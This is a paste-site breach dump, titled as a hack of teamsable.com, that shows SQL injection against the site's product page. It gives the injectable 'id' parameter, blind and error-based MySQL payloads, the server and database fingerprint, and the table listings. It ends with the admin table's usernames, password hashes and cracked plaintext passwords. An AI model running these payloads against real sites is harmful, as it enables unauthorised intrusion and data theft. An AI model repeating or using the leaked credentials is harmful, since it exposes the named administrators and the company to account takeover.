Lifted

teamsable.com HACKED

Dec 24th, 2014
  1. /\ /\
  2. { `---' }
  3. { O O }
  4. ~~> V <~~
  5. \ \|/ /
  6. `-----'____
  7. / \ \_
  8. { }\ )_\_ _
  9. | \_/ |/ / \_\_/ )
  10. \__/ /(_/ \__/
  11. (__/
  12. Jasmine
  13. ==================================================
  14. http://www.teamsable.com/products/product_detail.php?id=36
  15.  
  16. Parameter: id
  17. Type: boolean-based blind
  18. Title: AND boolean-based blind - WHERE or HAVING clause
  19. Payload: id=36' AND 7418=7418 AND 'olBH'='olBH
  20.  
  21. Type: error-based
  22. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  23. Payload: id=36' AND (SELECT 8240 FROM(SELECT COUNT(*),CONCAT(0x7179666571,(SELECT (CASE WHEN (8240=8240) THEN 1 ELSE 0 END)),0x716f787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gXOn'='gXOn
  24. ---
  25. [22:44:02] [INFO] the back-end DBMS is MySQL
  26. web server operating system: Linux CentOS
  27. web application technology: Apache 2.2.23, PHP 5.4.27
  28. back-end DBMS: MySQL 5.0
  29.  
  30. available databases [3]:
  31. [*] information_schema
  32. [*] teamsable2
  33. [*] test
  34.  
  35. [14 tables]
  36. +-----------------+
  37. | admin |
  38. | admin_log |
  39. | banner |
  40. | contact |
  41. | contact_cata |
  42. | download |
  43. | download_file |
  44. | mail |
  45. | mail2 |
  46. | news |
  47. | news_cata |
  48. | product |
  49. | product_cata |
  50. | product_subcata |
  51. +-----------------+
  52.  
  53. Database: teamsable2
  54. Table: admin
  55. [13 columns]
  56. +----------------+--------------+
  57. | Column | Type |
  58. +----------------+--------------+
  59. | level | varchar(100) |
  60. | account | varchar(30) |
  61. | creator | varchar(20) |
  62. | creator_date | timestamp |
  63. | email | varchar(100) |
  64. | id | int(11) |
  65. | level_admin | int(1) |
  66. | login_date | datetime |
  67. | modifier | varchar(20) |
  68. | modify_date | datetime |
  69. | new_login_date | datetime |
  70. | password | varchar(50) |
  71. | username | varchar(50) |
  72. +----------------+--------------+
  73. Database: teamsable2
  74. Table: admin
  75. [3 entries]
  76. +---------------+----------------------------------+
  77. | username | password |
  78. +---------------+----------------------------------+
  79. | administrator | 1bd71dffb85790a2ad98dcc113f8acdc |---> Team1234
  80. | Ruby | 7c84e42be5e463bd0683c79bc1155042 |---> ruby0903
  81. | 百崴管理者 | d6ce70f6f50bd61e38cfbff41f691e41 |---> paviuser
  82. +---------------+----------------------------------+